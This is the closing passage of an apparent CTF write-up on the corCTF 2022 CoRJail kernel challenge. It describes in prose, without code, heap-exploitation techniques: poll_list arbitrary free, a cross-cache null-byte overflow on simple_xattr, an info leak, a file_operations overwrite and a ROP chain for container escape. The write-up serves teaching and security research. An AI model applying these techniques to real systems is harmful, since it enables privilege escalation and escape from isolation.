Note: In the exploit I use the assign_to_core() function to assign the process to another core before creating poll threads. This is useful to reduce noise due to thread creation on core 0 slabs. Once a thread has been created, it is assigned back to core-0 right before the poll() call using assign_thread_to_core(), a pthread_attr_setaffinity_np() wrapper.

Conclusion

poll_list objects, can be used to get a powerful arbitrary free primitive in almost every general purpose cache. Many recent vulnerabilities can be exploited using this structure in complete absence of msg_msg objects.

This challenge was an hard one and considering the 48 hours limit and the presence of other hard challenges, it only had one solver. A big shout out goes to Kylebot for getting first blood. It turns out that Extended security attributes were usable inside the container without requiring any special capability. So he could solve the challenge transforming the Off-By-Null in kmalloc-4k into a Cross-Cache Null Byte Overflow, targeting the list.next pointer of a simple_xattr structure in kmalloc-192.

This cache is unaligned, so he made the corrupted pointer point in middle of another simple_xattr object in the same slab. Here, he forged a fake header and obtained a Out-Of-Bounds Read primitive. This led to an information leak.

Finally, he used the recent unlinking attack with simple_xattr to overwrite the file_operations pointer of a file structure with a controlled heap address. From here he could hijack control flow and use a ROP-chain to escape from the container. What a crazy approach! Isn’t it?

If you have any question or need any clarification, feel free to contact me. You can find my contact information in About.

You can download CoRJail from the corCTF 2022 Public Archive.

References

Syscall statistics patch

Utilizing msg_msg Objects For Arbitrary Read And Arbitrary Write In The Linux Kernel

modprobe_path trick

Unlinking attack with simple_xattr